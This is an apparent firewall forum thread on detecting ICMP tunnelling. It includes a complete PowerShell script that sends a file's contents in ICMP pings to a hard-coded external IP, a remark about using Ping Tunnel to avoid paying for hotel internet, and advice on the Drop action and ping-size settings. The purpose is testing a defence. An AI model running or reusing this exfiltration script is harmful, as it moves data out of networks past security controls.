The icmp tunnel/exfill defined in the APPL blade is easy to bypass with all ICMP exfil blocked in the rulebase.

See attached 59 line powershell script.

#    Powershell-ICMP-Sender
#    ICMP Exfiltration script
#    Author: Oddvar Moe (@oddvarmoe)
#    License: BSD 3-Clause
#    Required Dependencies: None
#    Optional Dependencies: None
#    Early alpha version

# Script will take the infile you specify in the $inFile variable and divide it into 1472 byte chunks before sending
# This script also works with Metasploit's ICMP Exfil module: https://www.rapid7.com/db/modules/auxiliary/server/icmp_exfil
# Inspiration from : https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellIcmp.ps1

# TODO:
# Need transfer check
# Speeding it up using different methods
# Make it function based

    $IPAddress = "52.149.97.185"
    $ICMPClient = New-Object System.Net.NetworkInformation.Ping
    $PingOptions = New-Object System.Net.NetworkInformation.PingOptions
    $PingOptions.DontFragment = $true
    #$PingOptions.Ttl = 10
    
    # Must be divided into 1472 chunks
    [int]$bufSize = 1000
    $inFile = "C:\Users\awa\Documents\wrk\src\pingtunnel\test.txt"
    #$inFile = "C:\Users\awa\Desktop\FortiSandbox-4.0.2-JSON API Reference.pdf"
    

    $stream = [System.IO.File]::OpenRead($inFile)
    $chunkNum = 0
    $TotalChunks = [math]::floor($stream.Length / 1000)
    $barr = New-Object byte[] $bufSize
    
    # Start of Transfer
    $sendbytes = ([text.encoding]::ASCII).GetBytes("---START---")
    $ICMPClient.Send($IPAddress,10, $sendbytes, $PingOptions) | Out-Null

    # start PDF: 12:23


    while ($bytesRead = $stream.Read($barr, 0, $bufsize)) {
        #Write-Host $barr
        
        $ICMPClient.Send($IPAddress,10, $barr, $PingOptions) | Out-Null
        $ICMPClient.PingCompleted
        
        #Missing check if transfer is okay, added sleep.
        #sleep 1
        #$ICMPClient.SendAsync($IPAddress,60 * 1000, $barr, $PingOptions) | Out-Null
        
        Write-Output "Done with $chunkNum out of $TotalChunks"
        $chunkNum += 1
    }

    # End the transfer
    $sendbytes = ([text.encoding]::ASCII).GetBytes("---STOP---")
    $ICMPClient.Send($IPAddress,10, $sendbytes, $PingOptions) | Out-Null
    Write-Output "File Transfered"

Thanks guys much appreciate the feedback, I will check out the various options.

I'm a little late on this one... but if you want some insight on how that works, this is a good program for running TCP over ICMP:

Ping Tunnel - Send TCP traffic over ICMP 

This was a popular tool to use in hotels to get out of paying for Internet - then they started blocking ICMP.

Sorry to bring up a stale thread. Question about the "Action" in this protection. How does "Accept" vs "Drop" in the action column act on these events? Will it only drop if the size is above the threshold set in the Advanced Tab?

Curious how the settings look in the screengrab above behind the open dialogue box.

Thanks in advance.

For all but the Strict profile, the setting is Inactive.
For Strict profile, it is set to Accept.
These are defaults.

This means, in all cases, a packet that exceeds the configured Max Ping Size will be allowed.
Only when the Strict profile is used will this be logged (otherwise, no log is generated).
If you want to drop large pings, you will need to set the action to Drop in the relevant profile and set the size accordingly.